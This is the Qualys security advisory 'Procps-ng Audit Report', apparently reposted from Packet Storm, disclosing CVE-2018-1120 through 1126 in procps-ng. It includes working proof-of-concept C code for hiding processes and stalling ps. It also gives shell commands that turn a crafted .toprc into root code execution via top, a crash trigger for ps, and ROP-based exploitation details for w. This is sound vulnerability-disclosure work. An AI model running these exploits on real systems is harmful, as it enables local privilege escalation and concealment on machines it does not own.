Lucene search

K
packetstormQualys.comPACKETSTORM:147806
HistoryMay 22, 2018 - 12:00 a.m.

Procps-ng Audit Report

2018-05-2200:00:00
qualys.com
packetstormsecurity.com
75

EPSS

0.006

Percentile

77.9%

`  
Qualys Security Advisory  
  
Procps-ng Audit Report  
  
  
========================================================================  
Contents  
========================================================================  
  
Summary  
1. FUSE-backed /proc/PID/cmdline  
2. Unprivileged process hiding  
3. Local Privilege Escalation in top (Low Impact)  
4. Denial of Service in ps  
5. Local Privilege Escalation in libprocps (High Impact)  
5.1. Vulnerability  
5.2. Exploitation  
5.3. Exploitation details  
5.4. Non-PIE exploitation  
5.5. PIE exploitation  
Acknowledgments  
  
  
========================================================================  
Summary  
========================================================================  
  
We performed a complete audit of procps-ng, the "command line and full  
screen utilities for browsing procfs, a 'pseudo' file system dynamically  
generated by the [Linux] kernel to provide information about the status  
of entries in its process table" (https://gitlab.com/procps-ng/procps).  
procps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap,  
ps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w,  
watch, and the necessary libprocps library.  
  
We discovered and submitted patches for more than a hundred bugs and  
vulnerabilities in procps-ng; for reference, our patches are available  
at:  
  
https://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz  
  
In the remainder of this advisory, we present our most interesting  
findings:  
  
1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)  
  
An attacker can block any read() access to /proc/PID/cmdline by  
mmap()ing a FUSE file (Filesystem in Userspace) onto this process's  
command-line arguments. The attacker can therefore block pgrep, pidof,  
pkill, ps, and w, either forever (a denial of service), or for some  
controlled time (a synchronization tool for exploiting other  
vulnerabilities).  
  
2. Unprivileged process hiding (CVE-2018-1121)  
  
An unprivileged attacker can hide a process from procps-ng's  
utilities, by exploiting either a denial of service (a rather noisy  
method) or a race condition inherent in reading /proc/PID entries (a  
stealthier method).  
  
3. Local Privilege Escalation in top (CVE-2018-1122)  
  
top reads its configuration file from the current working directory,  
without any security check, if the HOME environment variable is unset  
or empty. In this very unlikely scenario, an attacker can carry out an  
LPE (Local Privilege Escalation) if an administrator executes top in  
/tmp (for example), by exploiting one of several vulnerabilities in  
top's config_file() function.  
  
4. Denial of Service in ps (CVE-2018-1123)  
  
An attacker can overflow the output buffer of ps, when executed by  
another user, administrator, or script: a denial of service only (not  
an LPE), because ps mmap()s its output buffer and mprotect()s its last  
page with PROT_NONE (an effective guard page).  
  
5. Local Privilege Escalation in libprocps (CVE-2018-1124)  
  
An attacker can exploit an integer overflow in libprocps's  
file2strvec() function and carry out an LPE when another user,  
administrator, or script executes a vulnerable utility (pgrep, pidof,  
pkill, and w are vulnerable by default; other utilities are vulnerable  
if executed with non-default options). Moreover, an attacker's process  
running inside a container can trigger this vulnerability in a utility  
running outside the container: the attacker can exploit this userland  
vulnerability and break out of the container or chroot. We will  
publish our proof-of-concept exploits in the near future.  
  
Additionally, CVE-2018-1125 has been assigned to  
0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and  
CVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.  
  
  
========================================================================  
1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)  
========================================================================  
  
In this experiment, we add a sleep(60) to hello_read() in  
https://github.com/libfuse/libfuse/blob/master/example/hello.c and  
compile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the  
command-line arguments of a simple proof-of-concept:  
  
$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello  
$ mkdir /tmp/fuse  
$ ./hello /tmp/fuse  
  
$ cat > fuse-backed-cmdline.c << "EOF"  
#include <fcntl.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <sys/mman.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <unistd.h>  
  
#define die() do { \  
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \  
exit(EXIT_FAILURE); \  
} while (0)  
  
#define PAGESZ ((size_t)4096)  
  
int  
main(const int argc, const char * const argv[])  
{  
if (argc <= 0) die();  
const char * const arg_start = argv[0];  
const char * const last_arg = argv[argc-1];  
const char * const arg_end = last_arg + strlen(last_arg) + 1;  
  
if (arg_end <= arg_start) die();  
const size_t len = arg_end - arg_start;  
if (len < 2 * PAGESZ) die();  
  
char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));  
if (addr < arg_start) die();  
if (addr + PAGESZ > arg_end) die();  
  
const int fd = open("/tmp/fuse/hello", O_RDONLY);  
if (fd <= -1) die();  
if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();  
if (close(fd)) die();  
  
for (;;) {  
sleep(1);  
}  
die();  
}  
EOF  
$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline  
$ ./fuse-backed-cmdline `perl -e 'print "A" x 8192'`  
  
Then, if root executes ps (for example):  
  
# time ps ax  
PID TTY STAT TIME COMMAND  
...  
real 1m0.021s  
user 0m0.003s  
sys 0m0.017s  
  
  
========================================================================  
2. Unprivileged process hiding (CVE-2018-1121)  
========================================================================  
  
Several procps-ng utilities (pgrep, pidof, pkill, ps, w) read the  
/proc/PID/cmdline of every process running on the system; hence, an  
unprivileged attacker can hide a process (albeit noisily) by exploiting  
a denial of service in procps-ng (for example, the FUSE-backed denial of  
service, or one of the integer overflows in file2strvec()).  
  
Alternatively, we devised a stealthier method for hiding a process:  
  
1/ fork() our process until it occupies the last PID  
(/proc/sys/kernel/pid_max - 1) or one of the last PIDs;  
  
2/ monitor (with inotify) the /proc directory and the /proc/PID/stat  
file of one of the very first PIDs, for IN_OPEN events (opendir() and  
open());  
  
3/ when these events occur (when a procps-ng utility starts scanning  
/proc for /proc/PID entries), fork() our process until its PID wraps  
around and occupies one of the very first PIDs;  
  
4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE  
event (closedir());  
  
5/ when this event occurs (when the procps-ng utility stops scanning  
/proc), go back to 1/.  
  
This simple method works, because the kernel's proc_pid_readdir()  
function returns the /proc/PID entries in ascending numerical order.  
Moreover, this race condition can be made deterministic by using a  
FUSE-backed /proc/PID/cmdline as a synchronization tool.  
  
$ cat > unprivileged-process-hiding.c << "EOF"  
#include <errno.h>  
#include <limits.h>  
#include <signal.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/inotify.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <sys/wait.h>  
#include <unistd.h>  
  
#define die() do { \  
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \  
exit(EXIT_FAILURE); \  
} while (0)  
  
int  
main(void)  
{  
for (;;) {  
char lost[64];  
{  
const pid_t hi = getpid();  
pid_t lo = fork();  
if (lo <= -1) die();  
if (!lo) { /* child */  
lo = getpid();  
if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */  
for (;;) {  
if (kill(hi, 0) != -1) continue;  
if (errno != ESRCH) die();  
break;  
}  
continue;  
}  
/* parent */  
if (lo > hi) exit(EXIT_FAILURE); /* child continues */  
int status = 0;  
if (waitpid(lo, &status, 0) != lo) die();  
if (!WIFEXITED(status)) die();  
if (WEXITSTATUS(status) != EXIT_SUCCESS) die();  
  
printf("%d -> %d -> ", hi, lo);  
for (;;) {  
struct stat st;  
if (--lo <= 0) die();  
snprintf(lost, sizeof(lost), "/proc/%d/stat", lo);  
if (stat(lost, &st) == 0) break;  
}  
printf("%d\n", lo);  
}  
  
const int pofd = inotify_init();  
if (pofd <= -1) die();  
if (inotify_add_watch(pofd, "/proc", IN_OPEN) <= -1) die();  
  
const int lofd = inotify_init();  
if (lofd <= -1) die();  
if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();  
  
const int pcfd = inotify_init();  
if (pcfd <= -1) die();  
if (inotify_add_watch(pcfd, "/proc", IN_CLOSE_NOWRITE) <= -1) die();  
  
char buf[sizeof(struct inotify_event) + NAME_MAX + 1];  
const struct inotify_event * const evp = (void *)buf;  
  
for (;;) {  
if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();  
if (evp->mask & IN_ISDIR) break;  
}  
  
if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();  
for (;;) {  
const pid_t hi = getpid();  
pid_t lo = fork();  
if (lo <= -1) die();  
if (lo) exit(EXIT_SUCCESS); /* parent */  
/* child */  
lo = getpid();  
if (lo < hi) {  
printf("%d -> %d\n", hi, lo);  
break;  
}  
}  
  
for (;;) {  
if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();  
if (evp->mask & IN_ISDIR) break;  
}  
  
if (close(pofd)) die();  
if (close(lofd)) die();  
if (close(pcfd)) die();  
}  
die();  
}  
EOF  
$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding  
$ ./unprivileged-process-hiding  
  
Then, if root executes ps (for example):  
  
# ps ax | grep '[u]nprivileged-process-hiding' | wc  
0 0 0  
  
  
========================================================================  
3. Local Privilege Escalation in top (CVE-2018-1122)  
========================================================================  
  
If a/ an administrator executes top in a directory writable by an  
attacker and b/ the HOME environment variable is unset or empty, then  
top reads its configuration file from the current working directory,  
without any security check:  
  
3829 static void configs_read (void) {  
....  
3847 p_home = getenv("HOME");  
3848 if (!p_home || p_home[0] == '\0')  
3849 p_home = ".";  
3850 snprintf(Rc_name, sizeof(Rc_name), "%s/.%src", p_home, Myname);  
3851   
3852 if (!(fp = fopen(Rc_name, "r"))) {  
....  
3865 if (fp) {  
3866 p = config_file(fp, Rc_name, &tmp_delay);  
  
Although b/ is very unlikely, we developed a simple command-line method  
for exploiting one of the vulnerabilities in config_file(), when top is  
not a PIE (Position-Independent Executable). For example, on Ubuntu  
16.04.4:  
  
$ file /usr/bin/top  
/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped  
  
First, we dump a clean configuration file to /tmp/.toprc, by running top  
and pressing the 'W' key:  
  
$ cd /tmp  
$ env -u HOME top  
W  
q  
  
Second, we add an arbitrary "inspect" command to this configuration file  
(inspect commands are normally executed when the user presses the 'Y'  
key):  
  
$ echo -e 'pipe\tname\tid>>/tmp/top.%d.%lx' >> .toprc  
  
To execute our inspect command without user interaction, we will emulate  
the 'Y' key by jumping directly into inspection_utility(), at 0x40a989  
(the fflush(stdout) is INSP_BUSY's last instruction):  
  
3442 static void inspection_utility (int pid) {  
....  
3496 case kbd_ENTER:  
3497 INSP_BUSY;  
3498 Insp_sel = &Inspect.tab[sel];  
3499 Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);  
  
40a97d: 48 8b 3d 1c f8 20 00 mov 0x20f81c(%rip),%rdi # 61a1a0 <stdout>  
40a984: e8 67 7f ff ff callq 4028f0 <fflush@plt>  
40a989: 48 63 05 2c f9 20 00 movslq 0x20f92c(%rip),%rax # 61a2bc  
40a990: 8b 74 24 74 mov 0x74(%rsp),%esi  
40a994: 48 c1 e0 06 shl $0x6,%rax  
40a998: 48 03 05 61 11 23 00 add 0x231161(%rip),%rax # 63bb00  
40a99f: 48 89 05 12 11 23 00 mov %rax,0x231112(%rip) # 63bab8  
40a9a6: 48 8b 78 18 mov 0x18(%rax),%rdi  
40a9aa: ff 10 callq *(%rax)  
40a9ac: 5b pop %rbx  
  
To jump directly into inspection_utility(), we will take control of  
top's execution flow, by exploiting a vulnerability in config_file().  
"sortindx" is read from the configuration file without any sanity check,  
and is later used by window_show() to access a struct FLD_t which  
contains a function pointer "sort":  
  
5876 static int window_show (WIN_t *q, int wmax) {  
....  
5894 qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);  
  
40de01: ba 08 00 00 00 mov $0x8,%edx  
40de06: 48 c1 e0 05 shl $0x5,%rax  
40de0a: 48 8b 88 30 99 61 00 mov 0x619930(%rax),%rcx  
40de11: e8 7a 47 ff ff callq 402590 <qsort@plt>  
  
To take control of this function pointer, we will write 0x40a989's LSW  
(Least Significant Word, 32 bits) into "graph_mems" and 0x40a989's MSW  
(Most Significant Word, 32 bits) into "summclr", which are read from the  
configuration file and written to 0x63ed30 (and 0x63ed34), a memory  
location accessible by 0x619930+(sortindx<<0x5):  
  
3676 static const char *config_file (FILE *fp, const char *name, float *delay) {  
....  
3710 if (3 > fscanf(fp, "\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\n"  
3711 , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))  
3712 return p;  
3713 if (4 != fscanf(fp, "\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\n"  
3714 , &w->rc.summclr, &w->rc.msgsclr  
3715 , &w->rc.headclr, &w->rc.taskclr))  
3716 return p;  
  
406f90: 4d 8d b5 30 ed 63 00 lea 0x63ed30(%r13),%r14  
.......  
406fa9: 41 56 push %r14  
.......  
406fb3: e8 d8 b7 ff ff callq 402790 <fscanf@plt>  
.......  
406fca: 49 8d 95 34 ed 63 00 lea 0x63ed34(%r13),%rdx  
.......  
406fe5: e8 a6 b7 ff ff callq 402790 <fscanf@plt>  
  
Next, we modify the configuration file's "graph_mems", "summclr", and  
"sortindx" accordingly:  
  
$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc  
  
$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc  
  
$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc  
  
Last, we turn off the View_MEMORY bit in the configuration file's  
"winflags", to prevent summary_show() from crashing because of our  
out-of-bounds "graph_mems":  
  
314 #define View_MEMORY 0x001000 // 'm' - display memory summary  
  
5418 static void summary_show (void) {  
....  
5499 if (isROOM(View_MEMORY, 2)) {  
....  
5540 if (w->rc.graph_mems) {  
....  
5559 ix = w->rc.graph_mems - 1;  
....  
5572 snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);  
  
$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\([0-9]*\).*'/'\1'/`  
$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc  
  
Then, if an administrator executes top in /tmp, without a HOME  
environment variable (or with an empty HOME environment variable):  
  
# cat /tmp/top.*  
cat: '/tmp/top.*': No such file or directory  
  
# cd /tmp  
# env -u HOME top  
...  
signal 11 (SEGV) was caught by top, please  
see http://www.debian.org/Bugs/Reporting  
Segmentation fault (core dumped)  
  
# cat /tmp/top.*  
uid=0(root) gid=0(root) groups=0(root)  
  
  
========================================================================  
4. Denial of Service in ps (CVE-2018-1123)  
========================================================================  
  
ps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an  
mmap-based buffer overflow of outbuf (ps's output buffer):  
  
401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){  
402 char *endp = outbuf;  
403 int rightward = max_rightward;  
404 int fh = forest_helper(outbuf);  
405   
406 endp += fh;  
407 rightward -= fh;  
408   
409 if(pp->cmdline && !bsd_c_option)  
410 endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);  
411 else  
412 endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);  
413   
414 if(bsd_e_option && rightward>1) {  
415 if(pp->environ && *pp->environ) {  
416 *endp++ = ' ';  
417 rightward--;  
418 endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);  
419 }  
420 }  
421 return max_rightward-rightward;  
422 }  
  
The number of bytes written to endp by the escape*() functions is added  
to endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.  
Normally "rightward" prevents this buffer overflow, because the maximum  
number of "cells" written to outbuf is OUTBUF_SIZE, and is equal to the  
number of "bytes" written to outbuf; but not in escape_str_utf8():  
  
36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){  
..  
50 if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))  
..  
78 int wlen = wcwidth(wc);  
..  
100 memcpy(dst, src, len);  
101 my_cells += wlen;  
102 dst += len;  
103 my_bytes += len;  
104 src += len;  
  
For example, in the "en_US.UTF-8" locale, the multibyte sequence  
"\xf4\x81\x8e\xb6" consumes 4 bytes, but only 1 cell, and an easy  
trigger for one of the outbuf overflows is:  
  
$ (A=`python -c 'print "\xf4\x81\x8e\xb6" * 32767'` exec -a `python -c 'print "A" * 65535'` sleep 60) &  
[1] 2670  
  
# env LANG=en_US.UTF-8 ps awwe  
PID TTY STAT TIME COMMAND  
...  
Signal 11 (SEGV) caught by ps (procps-ng version 3.3.10).  
2670 pts/0 S 0:00ps:display.c:66: please report this bug  
Segmentation fault  
  
This buffer overflow is a denial of service only (not an LPE), because  
ps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an  
effective guard page):  
  
2147 void init_output(void){  
....  
2164 outbuf = mmap(  
2165 0,  
2166 page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses  
2167 PROT_READ | PROT_WRITE,  
2168 MAP_PRIVATE | MAP_ANONYMOUS,  
2169 -1,  
2170 0  
2171 );  
....  
2174 mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page  
  
  
========================================================================  
5. Local Privilege Escalation in libprocps (CVE-2018-1124)  
========================================================================  
  
========================================================================  
5.1. Vulnerability  
========================================================================  
  
libprocps's file2strvec() function parses a process's /proc/PID/cmdline  
(or /proc/PID/environ), and creates an in-memory copy of this process's  
argv[] (command-line argument strings, and pointers to these strings).  
file2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but  
not PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or  
PROC_FILLENV but not PROC_EDITENVRCVT).  
  
file2strvec() is vulnerable to three integer overflows (of "tot", "c",  
and "tot + c + align"):  
  
660 static char** file2strvec(const char* directory, const char* what) {  
661 char buf[2048]; /* read buf bytes at a time */  
662 char *p, *rbuf = 0, *endbuf, **q, **ret;  
663 int fd, tot = 0, n, c, end_of_file = 0;  
664 int align;  
...  
670 /* read whole file into a memory buffer, allocating as we go */  
671 while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {  
...  
686 rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */  
687 memcpy(rbuf + tot, buf, n); /* copy buffer into it */  
688 tot += n; /* increment total byte ctr */  
...  
697 endbuf = rbuf + tot; /* count space for pointers */  
698 align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));  
699 for (c = 0, p = rbuf; p < endbuf; p++) {  
700 if (!*p || *p == '\n')  
701 c += sizeof(char*);  
...  
705 c += sizeof(char*); /* one extra for NULL term */  
706   
707 rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */  
  
To the best of our knowledge, the integer overflows of "c" and "tot + c  
+ align" are not exploitable beyond a denial of service: they result in  
an mmap-based buffer overflow of rbuf, but with pointers only (pointers  
to our command-line argument strings, and a NULL terminator). Similarly,  
we were unable to exploit the integer overflow of "tot" on 32-bit.  
  
On 64-bit, however, the integer overflow of "tot" results in a memcpy()  
of arbitrary bytes (our command-line arguments) to an offset of roughly  
-2GB below rbuf. Surprisingly, the "xrealloc(rbuf, tot + n)" before the  
memcpy() does not exit() when "tot" becomes negative, because xrealloc()  
incorrectly uses an "unsigned int size" argument instead of a size_t  
(CVE-2018-1126):  
  
66 void *xrealloc(void *oldp, unsigned int size) {  
  
========================================================================  
5.2. Exploitation  
========================================================================  
  
To exploit the integer overflow of "tot" on 64-bit, we are faced with  
several difficulties:  
  
- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing  
Protector), and FORTIFY.  
  
- Our exploit must be one-shot, or as close to one-shot as possible: we  
may use brute-force if the target procps-ng utility is executed by a  
script, but we have only one chance to exploit this vulnerability if  
the target utility is executed manually by an administrator.  
  
- We have no control over the target utility's command-line arguments,  
environment variables, or resource limits (it is executed by another  
user, administrator, or script), and we have no direct channel for an  
information leak (we have no access to the target utility's output,  
for example).  
  
- We were unable to exploit the integer overflow of "tot" when rbuf is  
mmap()ed (but we were also unable to prove that it is unexploitable);  
when the integer "tot" overflows, rbuf is an mmap()ed chunk (its size  
is roughly 2GB), and because Linux's mmap() is a top-down allocator,  
we believe that:  
  
. rbuf must be allocated in a hole of the mmap-space (to survive the  
memcpy() at a negative offset below rbuf);  
  
. it is impossible to make such a large hole (in procps-ng, calls to  
the malloc functions are extremely rare).  
  
Despite these difficulties, we developed proof-of-concept exploits  
against the procps-ng utility "w" on Ubuntu 16.04 (a one-shot exploit  
against a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly  
one-shot exploit against a full RELRO, PIE w): if we first force "w" to  
malloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than  
mmap_threshold = 128KB), then malloc() will not call mmap() anymore, but  
will call brk() instead, even for chunks larger than mmap_threshold. The  
2GB rbuf (after the integer overflow of tot) will therefore be allocated  
on the heap by brk(), and because brk() is a bottom-up allocator, we can  
easily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning  
of the heap:  
  
- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure  
and its function pointers;  
  
- if w is a PIE, we overwrite the glibc's internal *gettext() structures  
and transform this memory corruption into a format-string exploit.  
  
To force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs  
(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,  
/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,  
even on 64-bit). This is not an unusual setting: large servers (database  
servers, container and storage platforms) commonly increase the value of  
pid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit  
our ability to spawn 64K processes: /proc/sys/kernel/threads-max,  
RLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,  
however, these limits are not insuperable obstacles:  
  
- they may be naturally greater than 64K, depending on the total number  
of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or  
the value of pid_max (for UserTasksMax);  
  
- they may not apply to the attacker's user account (for example,  
systemd-logind may not at all manage this specific user account);  
  
- in any case, we do not need to spawn 64K concurrent processes: if we  
use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need  
only a few concurrent processes.  
  
========================================================================  
5.3. Exploitation details  
========================================================================  
  
Our proof-of-concept exploit spawns five different types of processes  
("main", "mmap", "dist", "wrap", and "srpt"):  
  
- a long-lived "main" process, which spawns and coordinates the other  
processes;  
  
- 64K long-lived "mmap" processes, which guarantee that the ~2GB rbufs  
of our "dist" and "wrap" processes are allocated by brk() in the heap  
of our future "w" target; the "mmap" processes occupy the lowest PIDs  
available, to avoid interference from other processes with the heap  
layout of w;  
  
- a long-lived "dist" ("distance") process, whose /proc/PID/cmdline is  
carefully constructed to cover the exact distance between our target  
structure (at the beginning of w's heap) and the rbuf of our "wrap"  
process (at the end of w's heap);  
  
- a long-lived "wrap" ("integer wrap") process, which overflows the  
integer "tot" and overwrites our target structure at the beginning of  
w's heap (with the memcpy() at rbuf - 2GB);  
  
- short-lived "srpt" ("simulate readproctab") processes, which measure  
the exact distance between our target structure (at the beginning of  
w's heap) and the rbuf of our "wrap" process (at the end of w's heap);  
because this distance depends on an accurate list of processes running  
on the system, our exploit regularly spawns "srpt" processes until the  
distance stabilizes (it is particularly unstable after a reboot).  
  
We use a few noteworthy tricks in this exploit:  
  
- we do not fork() but clone() the "mmap" processes (we use the flags  
CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but  
not CLONE_THREAD, because each process must have its own /proc/PID  
entry): this is much faster, and significantly reduces the memory  
consumption of our exploit (the target "w" process itself already  
consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the  
"mmap", "dist", and "wrap" processes);  
  
- we analyze the ~2GB command-line argument strings of our "dist" and  
"wrap" processes, to detect repeated patterns and replace them with  
our equivalent file-backed mmap()s (this further reduces the memory  
consumption of the exploit); moreover, we replace the argv[] pointers  
of these processes with PROT_NONE mmap()s (hundreds of megabytes that  
are never accessed);  
  
- we initially simulated readproctab() with our own exploit code, but  
eventually switched to a small LD_PRELOAD library that instruments the  
real "w" utility and provides more accurate measurements.  
  
There is much room for improvement in this proof-of-concept exploit: for  
example, it depends on the exact distance between our target structure  
(at the beginning of w's heap) and the rbuf of our "wrap" process (at  
the end of w's heap), but this distance is hard to measure inside a  
container, because processes running outside the container are not  
visible inside the container (brute-force may be a solution if the  
target utility is executed by a script, but not if it is executed  
manually by an administrator; better solutions may exist).  
  
========================================================================  
5.4. Non-PIE exploitation  
========================================================================  
  
In this section, we describe our simplest proof-of-concept exploit,  
against the non-PIE "w" on Ubuntu 16.04: we overflow the integer "tot"  
in file2strvec(), we overwrite the PROCTAB structure and its function  
pointers, and we jump into the executable segment of w. However, w is  
very small and contains no useful gadgets, syscall instructions, or  
library calls. Instead, we use a technique pioneered by Nergal in  
http://phrack.org/issues/58/4.html ("5 - The dynamic linker's  
dl-resolve() function"):  
  
We jump to the very beginning of w's PLT (Procedure Linkage Table),  
which calls _dl_runtime_resolve() and _dl_fixup() with a "reloc_arg"  
that we control (it is read from the stack) and that indexes our own  
fake Elf64_Rela structure (in w's heap), which in turn indexes a fake  
Elf64_Sym structure, which in turn indexes a string that we control and  
that allows us to call any library function, by name (even if it does  
not appear in w's PLT). The obvious choice here is the "system"  
function:  
  
- the RDI register (the first argument of the function pointer that we  
overwrote, and hence the command argument of system()) points to the  
PROCTAB structure, whose contents we control;  
  
- we do not need to worry about the privilege dropping of /bin/sh,  
because w is not a set-user-ID executable.  
  
Finally, we must solve two practical problems to use this dynamic-linker  
technique against w:  
  
- our fake ELF structures are located in the heap, but indexed from the  
executable, and a random gap separates the heap from the executable:  
we therefore allocate four large areas in the heap (large enough to  
defeat the randomization of the heap), one for each of our fake  
structures (Elf64_Rela, Elf64_Sym, "system", and ndx for symbol  
versioning);  
  
- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym  
are 24-byte structures: luckily, the last 8 bytes of these structures  
are unused, and we therefore truncate our fake structures to 16 bytes.  
  
For example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with  
the following ROP chain:  
  
procfs taskdir tdu df finder reader tfinder  
|--------|--------|----+---|--------|--------|--------|------|--------|--------|  
| id>>/tmp/w.$$ |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|  
|--------|--------|----+---|--------|--------|--------|------|--------|--------|  
0xffb8 bytes  
  
- the first gadget that we execute, 0x4020bb, pivots the stack pointer  
to RDI (which points to the very beginning of the PROCTAB structure):  
"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;"  
  
- the second gadget that we execute, 0x4029db, increases the stack  
pointer by 0xffb8 bytes (it would otherwise crash into the beginning  
of the heap, because the stack grows down): "ret 0xffb8;"  
  
- the third gadget that we execute, 0x401100, calls  
_dl_runtime_resolve() and _dl_fixup() with our own "relocarg" (this  
effectively calls system() with the command located at RDI,  
"id>>/tmp/w.$$"):  
  
401100: ff 35 02 2f 20 00 pushq 0x202f02(%rip)  
401106: ff 25 04 2f 20 00 jmpq *0x202f04(%rip)  
  
- the fourth gadget that we execute, 0x402a50, makes a clean exit:  
  
402a50: bf 01 00 00 00 mov $0x1,%edi  
402a55: e8 36 e7 ff ff callq 401190 <_exit@plt>  
  
$ ./w-exploit-Non-PIE  
positive_tot 2147482113  
distance_tot 2147482112  
distance 12024752  
...  
distance 12024752  
off 279917264  
ver_beg 2e26ce0 ver_end 5426ce0  
rel_beg 15f19fb0 rel_end 18519fb0  
str_beg 2900d280 str_end 2b60d280  
sym_beg 3c100570 sym_end 3e700570  
reloc_arg 16957128  
nentries 5  
POSITIVE_TOT 2147482113  
DISTANCE_TO_PT 1  
negwrite_off 2147485183  
nentries 1  
ready  
  
Then, if an administrator executes w:  
  
# cat /tmp/w.*  
cat: '/tmp/w.*': No such file or directory  
  
# w  
  
# cat /tmp/w.*  
uid=0(root) gid=0(root) groups=0(root)  
  
========================================================================  
5.5. PIE exploitation  
========================================================================  
  
In this section, we describe our proof-of-concept exploit against the  
PIE "w" on Debian 9 and Fedora 27. The first technique that we tried, a  
partial overwrite of a function pointer in the PROCTAB structure, does  
not work:  
  
- we are limited to a 2-byte overwrite, or else we lose the "one-shot"  
quality of our exploit (we must brute-force the random bits that we  
overwrite);  
  
- the original function pointer refers to a piece of code in libprocps  
that offers a very limited choice of gadgets;  
  
- file2strvec() ends our command-line argument strings (which overwrite  
the function pointer) with a null byte, and further reduces the number  
of available gadgets.  
  
Our second, working technique is derived from halfdog's fascinating  
https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and  
transforms libprocps's integer overflow and memory corruption into a  
format-string exploit:  
  
- we overwrite the dirname pointer to "/usr/share/locale" (a member of  
the struct binding malloc()ated at the very beginning of w's heap by  
bindtextdomain()) with a pointer to "/tmp" -- we do not need to worry  
about ASLR, because we arrange for file2strvec() to overwrite dirname  
with a pointer to our command-line argument strings; alternatively, we  
could overwrite the "procps-ng" string (malloc()ated at the beginning  
of w's heap by textdomain()), but this would also overwrite the chunk  
header of the struct PROCTAB, and would cause a crash in closeproc();  
  
- we thereby control the translation strings returned by the *gettext()  
functions and the _() macro (the overwritten dirname pointer is used  
to construct the names of the translation files ".mo") and therefore  
control two format-strings in w's main():  
  
591 printf(_("%-*s TTY "), userlen, _("USER"));  
...  
595 printf(_(" LOGIN@ IDLE JCPU PCPU WHAT\n"));  
  
- we exploit the first format-string to create a pointer to a saved RIP  
